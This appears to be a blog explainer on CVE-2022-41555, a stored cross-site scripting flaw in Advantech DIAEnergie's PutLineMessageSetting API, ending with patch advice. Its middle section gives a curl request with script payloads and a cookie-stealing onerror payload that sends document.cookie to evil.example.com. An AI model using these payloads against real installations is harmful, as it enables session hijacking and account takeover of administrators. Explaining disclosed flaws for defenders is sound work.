CVE-2022-41555 is a stored cross-site scripting (XSS) vulnerability discovered in Advantech’s DIAEnergie energy management software. Specifically, versions prior to v1.9.01.002 are affected due to flaws in the PutLineMessageSetting API endpoint. This post will help you understand what the vulnerability is, how it can be exploited, and what steps are necessary to secure your systems.
What is DIAEnergie?
DIAEnergie is an Advantech tool designed for energy data management. It's commonly deployed in factories, buildings, and data centers to monitor and optimize energy consumption.
What Is This Vulnerability About?
CVE-2022-41555 is a _stored XSS_ vulnerability. Unlike _reflected XSS_, which happens immediately on input, _stored XSS_ means an attack payload is saved in the database and later shown to users (often with higher privilege) in a web interface.
For DIAEnergie, the problem lies with the PutLineMessageSetting API used to save line message configurations. If a user injects JavaScript here, the script will be stored and later executed when others view the affected data.
Why Is This a Big Deal?
A successful XSS attack lets an attacker impersonate users, steal sensitive data, manipulate displays, or even perform _drive-by_ malware installations using the user’s browser privileges.
1. Finding the API Endpoint
The affected endpoint is typically accessible at http://<server>/API/PutLineMessageSetting.
Suppose the API lets users set a “line message” containing a description, like this JSON
{
"message": "Normal operation"
}
An attacker would replace the value with an XSS payload, such as
{
"message": "<script>alert('XSS')</script>"
}
You could use cURL or Postman to send this data
curl -X POST "http://<server>/API/PutLineMessageSetting" \
-H "Content-Type: application/json" \
-d '{"message": "<script>alert(Stored XSS!)</script>"}'
Note: Replace <server> with your actual DIAEnergie server address. You’ll probably need to be authenticated, so the attack usually requires attacker access to the application (e.g., “low privilege” account).
4. Triggering the Attack
The payload <script>alert('XSS')</script> is stored in the system. When any other user later visits the management web interface that shows the line messages, the browser will execute the malicious JavaScript.
Result: The attacker’s script runs in the victim’s browser, with the victim’s authority.
Attacker logs in as a regular user.
- Attacker crafts a clever “message” containing JavaScript (it could be, for example: <img src=x onerror=alert('XSS')> or more sophisticated stealing session cookies).
User with admin rights logs into the management dashboard to check status and messages.
- Their browser executes the JavaScript hidden in the message, potentially exposing admin session info or even letting the attacker take over their account.
This is a common XSS exploit using image-based error event
{
"message": "<img src='x' onerror='fetch(https://evil.example.com/steal?cookie= + document.cookie)'>"
}
With this, when an admin opens the affected page, their browser tries to load an image from "x" (which doesn't exist), fires the onerror handler, and sends their cookies out to an attacker-controlled server.
How to Fix
Advantech fixed this vulnerability in version v1.9.01.002.
If you are running an older version, patch immediately!
References & Further Reading
- Official Advantech advisory: DIAEnergie Vulnerabilities
- CVE Details: CVE-2022-41555 (MITRE)
- OWASP XSS Guide: OWASP Cross Site Scripting
Conclusion
CVE-2022-41555 is a classic example of stored XSS that can have severe consequences in industrial/OT environments. It’s easy for attackers to exploit if they have even limited access.
If you run DIAEnergie, update immediately, and always treat internal applications with the same care for XSS that you would a public website.
Timeline
Published on: 10/27/2022 21:15:00 UTC
Last modified on: 10/28/2022 18:35:00 UTC